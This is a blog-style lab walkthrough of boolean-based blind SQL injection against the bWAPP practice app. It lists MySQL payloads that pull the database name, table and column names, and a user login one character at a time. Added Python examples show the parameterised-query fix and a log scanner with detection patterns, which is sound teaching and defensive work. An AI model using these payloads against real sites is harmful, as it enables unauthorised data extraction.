Wednesday, February 5, 2020

bWAPP SQL Injection - Blind - Boolean-Based

First we determine the length of the database name. We compare the result of the length() function against a guessed number; the page responds differently when the comparison is true, so each guess answers one yes/no question.

a' or length(database())=2#

We find that the database name is five characters long. The next step is to extract the name letter by letter with MySQL's substring function.

a' or substring(database(),1,1)='a'#
a' or substring(database(),1,1)='b'#
a' or substring(database(),2,1)='W'#
a' or substring(database(),3,1)='A'#
a' or substring(database(),4,1)='P'#
a' or substring(database(),5,1)='P'#

We find that the current database's name is 'bWAPP'. Now let's move on to tables and columns.
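The oracle the two steps above rely on exists only because the search term is concatenated into the SQL string. The following added example (not bWAPP's code) reproduces that oracle against a constructed in-memory SQLite database and shows that a parameterised query removes it. Assumptions: the search runs a LIKE query (the movie rows and the single users row are made up); SQLite comments with `-- ` where the page's MySQL payloads use `#`, and its `=` on strings is case-sensitive.

```python
import sqlite3


def build_db():
    # Constructed stand-in for the movie search table plus a users table (assumption).
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE movies (title TEXT);
        INSERT INTO movies VALUES ('Iron Man'), ('The Matrix'), ('Avatar');
        CREATE TABLE users (login TEXT);
        INSERT INTO users VALUES ('A.I.M.');
        """
    )
    return conn


def search_vulnerable(conn, title):
    # String concatenation: a quote in the input closes the literal and the rest of
    # the input is parsed as SQL. This is the pattern the walkthrough exploits.
    sql = "SELECT title FROM movies WHERE title LIKE '%" + title + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(conn, title):
    # Parameterised query: the whole input is bound as one string value and cannot
    # change the statement's structure, however many quotes it contains.
    sql = "SELECT title FROM movies WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + title + "%",))]


def oracle(search, conn, payload):
    """The boolean oracle: does the page show any results for this input?"""
    return len(search(conn, payload)) > 0


# Two probes in the page's style: the injected condition is true in one, false in the other.
PROBE_TRUE = "a' or substr((select login from users limit 1),1,1)='A' -- "
PROBE_FALSE = "a' or substr((select login from users limit 1),1,1)='B' -- "


def leak_observed(search):
    """True when the two probes give different answers, i.e. one bit of data leaks."""
    conn = build_db()
    return oracle(search, conn, PROBE_TRUE) != oracle(search, conn, PROBE_FALSE)


if __name__ == "__main__":
    print("vulnerable leaks a bit:", leak_observed(search_vulnerable))
    print("hardened leaks a bit:", leak_observed(search_hardened))
```

With the vulnerable function the true probe returns every movie and the false probe returns none, which is exactly the difference the walkthrough reads off the page; with the bound parameter both probes are just a pattern that matches nothing. Binding does not neutralise the LIKE wildcards `%` and `_` in user input; that is a separate escaping concern, not an injection.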

Table names are recovered one character at a time by comparing the character's ASCII code. A greater-than comparison first narrows the range of candidate codes, then an equality comparison confirms the exact value, and we record each character that yields a true statement.

a' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>95#
a' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))=104#

Here we find that the first character of the table name is ASCII 104, i.e. 'h'. To move on to the next character in the string we increment the substr start position by one.

After some time we identify a table called users that we want to investigate. Let's query the SQL server for its column names the same way.

a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))>95#
a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=108#
a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),2,1)))=111#
a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),3,1)))=103#
a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),4,1)))=105#
a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),5,1)))=110#

From this first pass we find that the column name is 'login'. To get the next column we repeat the same steps with the limit offset in the subquery increased by one.

Finally we select the 'login' column from the 'users' table and, just as before, iterate through the characters one by one until the string is complete.

a' or ascii(substring((SELECT login from users limit 0,1),1,1))>99#
a' or ascii(substring((SELECT login from users limit 0,1),1,1))=65#

We find that the first character of the login column is 'A'. We continue like before until we reach a complete string.
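Every step of this walkthrough, from the length check through the table, column and login extraction, sends a long run of near-identical requests that differ only in a position or a compared number, which is what makes the activity visible in the web server log. The following added example (not part of the original post) scans Common Log Format lines for the probe signatures shown above and flags clients that send several of them. The log lines, the client addresses and the `/search.php` path are constructed for the example; the signatures are derived from the payloads on this page.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures of the probes used in this walkthrough: a quote, then OR, then either
# length() or a (possibly ascii()-wrapped) substr/substring call, plus lookups in
# information_schema. Matching runs on the decoded request so URL encoding cannot hide them.
PATTERNS = [
    re.compile(r"'\s*or\s+length\s*\(", re.I),
    re.compile(r"'\s*or\s+\(?\s*(?:ascii\s*\(\s*)?substr(?:ing)?\s*\(", re.I),
    re.compile(r"information_schema\.(?:tables|columns)", re.I),
]

# Common Log Format as Apache writes it by default (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log: 10.0.0.5 sends the page's probes, 10.0.0.9 mostly browses normally.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Feb/2020:10:00:01 +0000] "GET /search.php?title=a%27+or+length%28database%28%29%29%3D5%23 HTTP/1.1" 200 1532
10.0.0.9 - - [05/Feb/2020:10:00:02 +0000] "GET /search.php?title=Iron+Man HTTP/1.1" 200 1210
10.0.0.5 - - [05/Feb/2020:10:00:03 +0000] "GET /search.php?title=a%27+or+substring%28database%28%29%2C1%2C1%29%3D%27b%27%23 HTTP/1.1" 200 1532
10.0.0.5 - - [05/Feb/2020:10:00:04 +0000] "GET /search.php?title=a%27+or+%28ascii%28substr%28%28select+table_name+from+information_schema.tables+where+table_schema%3Ddatabase%28%29+limit+1%2C1%29%2C1%2C1%29%29%29%3E95%23 HTTP/1.1" 200 1532
10.0.0.9 - - [05/Feb/2020:10:00:05 +0000] "GET /search.php?title=Matrix HTTP/1.1" 200 1210
10.0.0.9 - - [05/Feb/2020:10:00:06 +0000] "GET /search.php?title=a%27+or+length%28database%28%29%29%3D2%23 HTTP/1.1" 200 980
10.0.0.5 - - [05/Feb/2020:10:00:07 +0000] "GET /search.php?title=a%27+or+ascii%28substring%28%28SELECT+login+from+users+limit+0%2C1%29%2C1%2C1%29%29%3E99 HTTP/1.1" 200 1532
"""


def parse_line(line):
    """Return the fields of one log line, or None if it is not in CLF."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_blind_probe(request_path):
    """True if the decoded request matches one of the boolean-blind signatures."""
    decoded = unquote_plus(request_path)
    return any(p.search(decoded) for p in PATTERNS)


def probe_counts(log_text):
    """Number of matching requests per client address."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_blind_probe(rec["path"]):
            counts[rec["ip"]] += 1
    return dict(counts)


def flag_sources(log_text, threshold=3):
    """Clients at or above the threshold. Character-by-character extraction needs
    many requests, so the volume of matches is a stronger signal than any single hit."""
    return {ip: n for ip, n in probe_counts(log_text).items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in flag_sources(SAMPLE_LOG).items():
        print(f"{ip}: {n} boolean-blind probes")
```

Note that every probe here returned HTTP 200, so status codes alone show nothing; the signal is the request content and its repetition from one address. A production detector would also normalise comment syntax, whitespace and double encoding, which this example deliberately keeps simple.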
